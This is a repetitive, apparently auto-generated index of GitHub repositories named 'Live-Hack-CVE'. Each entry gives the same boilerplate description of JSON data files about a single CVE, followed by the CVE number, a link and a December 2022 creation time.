**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42052 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42052](https://github.com/Live-Hack-CVE/CVE-2021-42052) create time: 2022-12-26T14:18:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45454 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45454](https://github.com/Live-Hack-CVE/CVE-2021-45454) create time: 2022-12-26T14:17:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35464 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35464](https://github.com/Live-Hack-CVE/CVE-2022-35464) create time: 2022-12-26T15:01:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35463](https://github.com/Live-Hack-CVE/CVE-2022-35463) create time: 2022-12-26T15:01:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35461 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35461](https://github.com/Live-Hack-CVE/CVE-2022-35461) create time: 2022-12-26T15:01:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35462 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35462](https://github.com/Live-Hack-CVE/CVE-2022-35462) create time: 2022-12-26T15:01:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35460 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35460](https://github.com/Live-Hack-CVE/CVE-2022-35460) create time: 2022-12-26T15:01:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35456 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35456](https://github.com/Live-Hack-CVE/CVE-2022-35456) create time: 2022-12-26T15:01:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35459 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35459](https://github.com/Live-Hack-CVE/CVE-2022-35459) create time: 2022-12-26T15:01:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35458 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35458](https://github.com/Live-Hack-CVE/CVE-2022-35458) create time: 2022-12-26T15:01:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35455 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35455](https://github.com/Live-Hack-CVE/CVE-2022-35455) create time: 2022-12-26T15:01:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35454 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35454](https://github.com/Live-Hack-CVE/CVE-2022-35454) create time: 2022-12-26T15:00:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35453 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35453](https://github.com/Live-Hack-CVE/CVE-2022-35453) create time: 2022-12-26T15:00:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35451 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35451](https://github.com/Live-Hack-CVE/CVE-2022-35451) create time: 2022-12-26T15:00:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35450 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35450](https://github.com/Live-Hack-CVE/CVE-2022-35450) create time: 2022-12-26T15:00:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35452 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35452](https://github.com/Live-Hack-CVE/CVE-2022-35452) create time: 2022-12-26T15:00:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35447 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35447](https://github.com/Live-Hack-CVE/CVE-2022-35447) create time: 2022-12-26T15:00:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35448 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35448](https://github.com/Live-Hack-CVE/CVE-2022-35448) create time: 2022-12-26T15:00:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35449 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35449](https://github.com/Live-Hack-CVE/CVE-2022-35449) create time: 2022-12-26T15:00:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38184 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38184](https://github.com/Live-Hack-CVE/CVE-2022-38184) create time: 2022-12-26T15:00:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36530](https://github.com/Live-Hack-CVE/CVE-2022-36530) create time: 2022-12-26T15:00:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36599 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36599](https://github.com/Live-Hack-CVE/CVE-2022-36599) create time: 2022-12-26T14:59:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38362 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38362](https://github.com/Live-Hack-CVE/CVE-2022-38362) create time: 2022-12-26T14:59:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36242 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36242](https://github.com/Live-Hack-CVE/CVE-2022-36242) create time: 2022-12-26T14:59:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35474 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35474](https://github.com/Live-Hack-CVE/CVE-2022-35474) create time: 2022-12-26T14:59:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35473 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35473](https://github.com/Live-Hack-CVE/CVE-2022-35473) create time: 2022-12-26T14:59:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35475 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35475](https://github.com/Live-Hack-CVE/CVE-2022-35475) create time: 2022-12-26T14:59:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35470 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35470](https://github.com/Live-Hack-CVE/CVE-2022-35470) create time: 2022-12-26T14:59:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35471 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35471](https://github.com/Live-Hack-CVE/CVE-2022-35471) create time: 2022-12-26T14:59:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35472 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35472](https://github.com/Live-Hack-CVE/CVE-2022-35472) create time: 2022-12-26T14:59:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35467](https://github.com/Live-Hack-CVE/CVE-2022-35467) create time: 2022-12-26T14:59:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2390 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2390](https://github.com/Live-Hack-CVE/CVE-2022-2390) create time: 2022-12-26T14:59:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3738 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3738](https://github.com/Live-Hack-CVE/CVE-2017-3738) create time: 2022-12-26T14:12:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3173 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3173](https://github.com/Live-Hack-CVE/CVE-2018-3173) create time: 2022-12-26T14:14:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3277 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3277](https://github.com/Live-Hack-CVE/CVE-2018-3277) create time: 2022-12-26T14:13:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3200 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3200](https://github.com/Live-Hack-CVE/CVE-2018-3200) create time: 2022-12-26T14:13:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2810 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2810](https://github.com/Live-Hack-CVE/CVE-2018-2810) create time: 2022-12-26T14:13:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3063 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3063](https://github.com/Live-Hack-CVE/CVE-2018-3063) create time: 2022-12-26T14:13:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3162 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3162](https://github.com/Live-Hack-CVE/CVE-2018-3162) create time: 2022-12-26T14:13:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2777 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2777](https://github.com/Live-Hack-CVE/CVE-2018-2777) create time: 2022-12-26T14:13:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2759 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2759](https://github.com/Live-Hack-CVE/CVE-2018-2759) create time: 2022-12-26T14:13:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-2781 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-2781](https://github.com/Live-Hack-CVE/CVE-2018-2781) create time: 2022-12-26T14:13:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19841 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19841](https://github.com/Live-Hack-CVE/CVE-2018-19841) create time: 2022-12-26T13:32:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2481](https://github.com/Live-Hack-CVE/CVE-2019-2481) create time: 2022-12-26T14:14:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1559](https://github.com/Live-Hack-CVE/CVE-2019-1559) create time: 2022-12-26T14:12:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24402 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24402](https://github.com/Live-Hack-CVE/CVE-2020-24402) create time: 2022-12-26T14:12:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23466 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23466](https://github.com/Live-Hack-CVE/CVE-2020-23466) create time: 2022-12-26T13:39:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36599 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36599](https://github.com/Live-Hack-CVE/CVE-2020-36599) create time: 2022-12-26T13:38:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10401 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10401](https://github.com/Live-Hack-CVE/CVE-2020-10401) create time: 2022-12-26T13:36:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10398 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10398](https://github.com/Live-Hack-CVE/CVE-2020-10398) create time: 2022-12-26T13:36:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10394 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10394](https://github.com/Live-Hack-CVE/CVE-2020-10394) create time: 2022-12-26T13:36:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10395 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10395](https://github.com/Live-Hack-CVE/CVE-2020-10395) create time: 2022-12-26T13:36:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10397 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10397](https://github.com/Live-Hack-CVE/CVE-2020-10397) create time: 2022-12-26T13:36:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10393 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10393](https://github.com/Live-Hack-CVE/CVE-2020-10393) create time: 2022-12-26T13:36:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10396 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10396](https://github.com/Live-Hack-CVE/CVE-2020-10396) create time: 2022-12-26T13:36:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10392 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10392](https://github.com/Live-Hack-CVE/CVE-2020-10392) create time: 2022-12-26T13:36:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10410 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10410](https://github.com/Live-Hack-CVE/CVE-2020-10410) create time: 2022-12-26T13:36:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10400 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10400](https://github.com/Live-Hack-CVE/CVE-2020-10400) create time: 2022-12-26T13:36:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10399 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10399](https://github.com/Live-Hack-CVE/CVE-2020-10399) create time: 2022-12-26T13:36:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10407 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10407](https://github.com/Live-Hack-CVE/CVE-2020-10407) create time: 2022-12-26T13:36:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10408 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10408](https://github.com/Live-Hack-CVE/CVE-2020-10408) create time: 2022-12-26T13:36:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10402 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10402](https://github.com/Live-Hack-CVE/CVE-2020-10402) create time: 2022-12-26T13:36:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10404 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10404](https://github.com/Live-Hack-CVE/CVE-2020-10404) create time: 2022-12-26T13:36:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10406 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10406](https://github.com/Live-Hack-CVE/CVE-2020-10406) create time: 2022-12-26T13:35:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10403 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10403](https://github.com/Live-Hack-CVE/CVE-2020-10403) create time: 2022-12-26T13:35:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10405 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10405](https://github.com/Live-Hack-CVE/CVE-2020-10405) create time: 2022-12-26T13:35:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10409 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10409](https://github.com/Live-Hack-CVE/CVE-2020-10409) create time: 2022-12-26T13:35:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10413 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10413](https://github.com/Live-Hack-CVE/CVE-2020-10413) create time: 2022-12-26T13:35:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10414 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10414](https://github.com/Live-Hack-CVE/CVE-2020-10414) create time: 2022-12-26T13:35:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10412 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10412](https://github.com/Live-Hack-CVE/CVE-2020-10412) create time: 2022-12-26T13:35:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10411 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10411](https://github.com/Live-Hack-CVE/CVE-2020-10411) create time: 2022-12-26T13:35:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10418 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10418](https://github.com/Live-Hack-CVE/CVE-2020-10418) create time: 2022-12-26T13:35:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10420 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10420](https://github.com/Live-Hack-CVE/CVE-2020-10420) create time: 2022-12-26T13:34:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10416 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10416](https://github.com/Live-Hack-CVE/CVE-2020-10416) create time: 2022-12-26T13:34:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10415 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10415](https://github.com/Live-Hack-CVE/CVE-2020-10415) create time: 2022-12-26T13:34:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32642](https://github.com/Live-Hack-CVE/CVE-2021-32642) create time: 2022-12-26T14:14:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45088 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45088](https://github.com/Live-Hack-CVE/CVE-2021-45088) create time: 2022-12-26T14:13:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45087 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45087](https://github.com/Live-Hack-CVE/CVE-2021-45087) create time: 2022-12-26T14:13:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45085 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45085](https://github.com/Live-Hack-CVE/CVE-2021-45085) create time: 2022-12-26T14:13:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1585 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1585](https://github.com/Live-Hack-CVE/CVE-2021-1585) create time: 2022-12-26T14:12:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21059 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21059](https://github.com/Live-Hack-CVE/CVE-2021-21059) create time: 2022-12-26T14:12:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21062 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21062](https://github.com/Live-Hack-CVE/CVE-2021-21062) create time: 2022-12-26T14:12:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21058 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21058](https://github.com/Live-Hack-CVE/CVE-2021-21058) create time: 2022-12-26T14:12:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21022 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21022](https://github.com/Live-Hack-CVE/CVE-2021-21022) create time: 2022-12-26T14:12:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21046 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21046](https://github.com/Live-Hack-CVE/CVE-2021-21046) create time: 2022-12-26T14:12:15Z

